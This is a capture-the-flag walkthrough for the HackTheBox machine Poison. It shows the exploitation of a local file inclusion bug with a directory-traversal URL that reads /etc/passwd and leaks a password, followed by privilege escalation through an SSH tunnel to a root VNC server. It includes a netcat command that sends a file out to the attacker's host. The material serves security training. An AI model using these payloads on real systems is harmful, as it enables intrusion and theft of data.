# HackTheBox - Poison Writeup ###### tags: `writeup` `HackTheBox` `Poison` `medium` `OSCP`  ## :computer: Port Scanning ```bash # Nmap 7.92 scan initiated Fri Jun 10 07:21:26 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports3 10.10.10.84 Nmap scan report for 10.10.10.84 Host is up (0.042s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32 Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jun 10 07:28:31 2022 -- 1 IP address (1 host up) scanned in 424.26 seconds ``` ## :eye: Enumeration If we enter on the web you can see we have a form that allow to write some file to load into the web:  So after looking into each file in the listfiles.php we can see that is a txt let's look into it.  After looking the URL we can easily recognize a LFI vulnerability, so knowing this let's try to load the **pwdbackup.txt** file using this URL: ```bash http://10.10.10.84/browse.php?file=pwdbackup.txt ```  Reading this we see that it's encoded, but encoded means that we can decode it easily, i gonna use [CyberChef](https://gchq.github.io/CyberChef/) and it looks like is base64 encoding so let's decode it 13 times.  After decoding it 13 times we know the password: >Charix!2#4%6&8(0 ## :bomb: Explotation I suppose that may will be the ssh password but we don't know the user so knowing that we have a LFI vulnerability let's read the **\/etc\/password** file to know the users. To do this we have to use a LFI payload that go back in the directories and enter into \/etc\/password so we are gonna use this: ```bash http://10.10.10.84/browse.php?file=../../../../../../etc/passwd ```  Knowing a little bit of linux we have to know that every user that has and id < 1000 is a service user we know now the user for the ssh so let's try to connect using the decoded password and the **charix** user.  After that we have the user flag:  It's time to privesc! --- ### ⏫Root Privesc First thing we do is trying to unzip the secret zip.  So we can't unzip it on the target machine so let's download it to our machine, to do this we are gonna use netcat that comes installed into the machine. We have to start a netcat listener in our machine and a nectat connection in the target machine to transfer the file: First execute this command in our machine: ```bash nc -nvlp 9999 > secret.zip ``` After that execute this on the target machine: ```bash nc -nv 10.10.10.10 9999 < secret.zip ``` After executed this we receive the secret.zip file in our machine!  Let's try to unzip it using the same password as the ssh connection: >Charix!2#4%6&8(0  After unzip the secret file we see that it has some strange characters and is an Non-iSO filetype:  After that it's time to look again into the machine an enumerate more to see what we can do. Looking some common things and using scripts like linpeas and other privesc script i remember to look the running processes so it time to run: ```bash ps aux ``` After executing this I found a interesting thing.  There is a vncserver running on the machine as root, but we can't access from outside because we don't see it on the port scan, so we have to do a SSH tunnel to allow us to look into the vnc. To see more info about vnc let's look into the [Hacktricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc) webpage, after looking into it i found that we can decrypt the secret file with a tool called [vncpwd](https://github.com/jeroennijhof/vncpwd) , after download it and compiled we can obtain the plain text password for the vnc.  With this and knowing that the port for the VNC is 5901 it's time to start the SSH tunnel and try to connect.  ```bash ssh charix@10.10.10.84 -L 1337:localhost:5901 -fN ``` With this command we start the Bind SSH Tunnel and we indicate that we only want the connection and we aren't gonna need the ssh terminal. Now it's time to connect to the VNC using the file secret because in this case the decrypted password don't work well so we are gonna use the secret file directly: ```bash sudo vncviewer -passwd secret localhost:1337 ```  After that a VNC window pop up logged as root so we can read the root flag.  To make easy to work with it, I changed the root password to root:root and logged in with ssh because my VNC don't work very well.  And thats all we pwned the machine! To understand better the pivoting part and the SSH connections I really recommend the [Wreath](https://tryhackme.com/room/wreath) Lab from Tryhackme that explains very well how works all. --- ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)